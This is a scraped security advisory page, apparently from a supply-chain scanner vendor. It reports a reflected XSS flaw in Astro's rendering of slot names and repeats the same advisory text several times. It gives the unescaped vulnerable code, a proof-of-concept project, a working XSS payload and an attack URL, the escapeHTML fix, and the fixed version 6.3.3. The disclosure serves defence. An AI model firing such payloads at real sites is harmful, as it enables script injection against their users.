## Summary When a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR. This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point. ## Vulnerable Code `packages/astro/src/runtime/server/render/component.ts:371:376` ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>` ``` I found that key is interpolated directly into the attribute value without proper escaping. ## Proof of Concept For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0. **`astro.config.mjs`** ```js import react from '@astrojs/react'; import node from '@astrojs/node'; import { defineConfig } from 'astro/config'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), integrations: [react()], }); ``` **`src/pages/index.astro`** ```astro --- import Wrapper from '../components/Wrapper.jsx'; const slotName = Astro.url.searchParams.get('tab') ?? 'default'; --- <html><body> <Wrapper client:load> <div slot={slotName}>content</div> </Wrapper> </body></html> ``` **`src/components/Wrapper.jsx`** ```jsx export default function Wrapper() { return null; } ``` **Payload:** ``` abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!-- ``` Accessing this URL will trigger the popup. http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!-- <img width="1268" height="592" alt="image" src="https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7" /> This will render in html. ```html <template data-astro-template="abc"></template></astro-island> <img src=x onerror=confirm(document.domain)><!--">content</template> ``` ## Fix I suggest leveraging the existing escape function on the slot name. ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>` ``` ---
## Summary When a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR. This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point. ## Vulnerable Code `packages/astro/src/runtime/server/render/component.ts:371:376` ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>` ``` I found that key is interpolated directly into the attribute value without proper escaping. ## Proof of Concept For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0. **`astro.config.mjs`** ```js import react from '@astrojs/react'; import node from '@astrojs/node'; import { defineConfig } from 'astro/config'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), integrations: [react()], }); ``` **`src/pages/index.astro`** ```astro --- import Wrapper from '../components/Wrapper.jsx'; const slotName = Astro.url.searchParams.get('tab') ?? 'default'; --- <html><body> <Wrapper client:load> <div slot={slotName}>content</div> </Wrapper> </body></html> ``` **`src/components/Wrapper.jsx`** ```jsx export default function Wrapper() { return null; } ``` **Payload:** ``` abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!-- ``` Accessing this URL will trigger the popup. http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!-- <img width="1268" height="592" alt="image" src="https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7" /> This will render in html. ```html <template data-astro-template="abc"></template></astro-island> <img src=x onerror=confirm(document.domain)><!--">content</template> ``` ## Fix I suggest leveraging the existing escape function on the slot name. ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>` ``` ---
Update astro to 6.3.3 if you use the affected versions. Test the change in a non-production environment first.
Local check
hol-guard supply-chain scanAstro: Reflected XSS via unescaped slot name affects astro (npm). Severity is high. ## Summary When a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR. This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point. ## Vulnerable Code `packages/astro/src/runtime/server/render/component.ts:371:376` ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>` ``` I found that key is interpolated directly into the attribute value without proper escaping. ## Proof of Concept For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0. **`astro.config.mjs`** ```js import react from '@astrojs/react'; import node from '@astrojs/node'; import { defineConfig } from 'astro/config'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), integrations: [react()], }); ``` **`src/pages/index.astro`** ```astro --- import Wrapper from '../components/Wrapper.jsx'; const slotName = Astro.url.searchParams.get('tab') ?? 'default'; --- <html><body> <Wrapper client:load> <div slot={slotName}>content</div> </Wrapper> </body></html> ``` **`src/components/Wrapper.jsx`** ```jsx export default function Wrapper() { return null; } ``` **Payload:** ``` abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!-- ``` Accessing this URL will trigger the popup. http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!-- <img width="1268" height="592" alt="image" src="https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7" /> This will render in html. ```html <template data-astro-template="abc"></template></astro-island> <img src=x onerror=confirm(document.domain)><!--">content</template> ``` ## Fix I suggest leveraging the existing escape function on the slot name. ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>` ``` ---
AI coding agents often install or upgrade packages automatically in npm. A high vulnerability in a dependency can be pulled into a project through a normal install or update without a human reviewing the change, expanding the blast radius from a single package to every agent workspace that depends on it.
| Package | Affected range | Fixed version |
|---|---|---|
| astronpm | <6.3.3 | 6.3.3 |
Fixed versions are reported by the source feed; confirm compatibility before updating.
Reported by GitHub Security Advisories (ghsa).
HOL Guard can help your team review package activity against supported protection paths.
Explore HOL GuardUpdate astro to 6.3.3 if you use the affected versions. Test the change in a non-production environment first.
Local check
hol-guard supply-chain scanAstro: Reflected XSS via unescaped slot name affects astro (npm). Severity is high. ## Summary When a component uses a `client:*` directive, Astro inserts named slot content into a `data-astro-template` attribute without HTML escaping the slot name allowing an attacker to break out of the attribute context and inject arbitrary HTML, resulting in reflected XSS during SSR. This is similar to GHSA-wrwg-2hg8-v723 but exploits a different injection point. ## Vulnerable Code `packages/astro/src/runtime/server/render/component.ts:371:376` ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${key}"` : ''}>${children[key]}</template>` ``` I found that key is interpolated directly into the attribute value without proper escaping. ## Proof of Concept For the PoC, I set up with a minimal repository with Astro 6.3.1, Node.js: v26.0.0. **`astro.config.mjs`** ```js import react from '@astrojs/react'; import node from '@astrojs/node'; import { defineConfig } from 'astro/config'; export default defineConfig({ output: 'server', adapter: node({ mode: 'standalone' }), integrations: [react()], }); ``` **`src/pages/index.astro`** ```astro --- import Wrapper from '../components/Wrapper.jsx'; const slotName = Astro.url.searchParams.get('tab') ?? 'default'; --- <html><body> <Wrapper client:load> <div slot={slotName}>content</div> </Wrapper> </body></html> ``` **`src/components/Wrapper.jsx`** ```jsx export default function Wrapper() { return null; } ``` **Payload:** ``` abc"></template></astro-island><img src=x onerror=confirm(document.domain)><!-- ``` Accessing this URL will trigger the popup. http://localhost:4321/?tab=abc%22%3E%3C%2Ftemplate%3E%3C%2Fastro-island%3E%3Cimg+src%3Dx+onerror%3Dconfirm(document.domain)%3E%3C!-- <img width="1268" height="592" alt="image" src="https://github.com/user-attachments/assets/675cdc04-4134-4d83-883c-abe16d751ec7" /> This will render in html. ```html <template data-astro-template="abc"></template></astro-island> <img src=x onerror=confirm(document.domain)><!--">content</template> ``` ## Fix I suggest leveraging the existing escape function on the slot name. ```ts // component.ts:371 `<template data-astro-template${key !== 'default' ? `="${escapeHTML(String(key))}"` : ''}>${children[key]}</template>` ``` ---
AI coding agents often install or upgrade packages automatically in npm. A high vulnerability in a dependency can be pulled into a project through a normal install or update without a human reviewing the change, expanding the blast radius from a single package to every agent workspace that depends on it.
| Package | Affected range | Fixed version |
|---|---|---|
| astronpm | <6.3.3 | 6.3.3 |
Fixed versions are reported by the source feed; confirm compatibility before updating.
Reported by GitHub Security Advisories (ghsa).
HOL Guard can help your team review package activity against supported protection paths.
Explore HOL Guard